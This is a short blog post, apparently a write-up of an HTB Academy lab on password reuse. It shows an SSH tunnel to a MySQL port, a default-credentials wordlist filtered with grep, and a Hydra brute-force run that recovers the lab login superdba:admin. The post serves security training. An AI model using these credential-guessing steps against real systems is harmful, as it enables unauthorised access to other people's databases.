This content originally appeared on DEV Community and was authored by maz4l
Challenge Overview:
The task is to find MySQL credentials using previously discovered user credentials. Below is the step-by-step approach I followed to solve this challenge.
Step 1: Establish an SSH Tunnel
Using SSH, I forwarded the MySQL port (3306) to my local machine:
ssh -L 4444:localhost:3306 sam@10.129.xx.xxx
-
Username:
sam -
Password:
B@t********
Step 2: Download Default Credentials Cheat Sheet
I fetched a default credentials cheat sheet that includes common MySQL credentials:
wget https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv
Step 3: Filter for MySQL Credentials
Using grep, I extracted MySQL-specific credentials from the cheat sheet and saved them to a file for further testing:
cat DefaultCreds-Cheat-Sheet.csv | grep MySql
grep -i 'mysql' DefaultCreds-Cheat-Sheet.csv > cred.list
I then manually edited the cred.list file to keep the most promising credentials:
admin@example.com:admin
root:<blank>
root:root
superdba:admin
Step 4: Brute-Force Login Using Hydra
To automate the login attempts, I used hydra with the credentials file:
hydra -C cred.list mysql://localhost:4444
Success!
After a few attempts, Hydra successfully found valid MySQL credentials:
-
Login:
superdba -
Password:
admin
[4444][mysql] host: localhost login: superdba password: admin
1 of 1 target successfully completed, 1 valid password found
Happy Hacking!
This content originally appeared on DEV Community and was authored by maz4l
maz4l | Sciencx (2024-08-18T08:35:55+00:00) HTB Academy: Password Attacks Module – Password Reuse/Default Passwords. Retrieved from https://www.scien.cx/2024/08/18/htb-academy-password-attacks-module-password-reuse-default-passwords/
Please log in to upload a file.
There are no updates yet.
Click the Upload button above to add an update.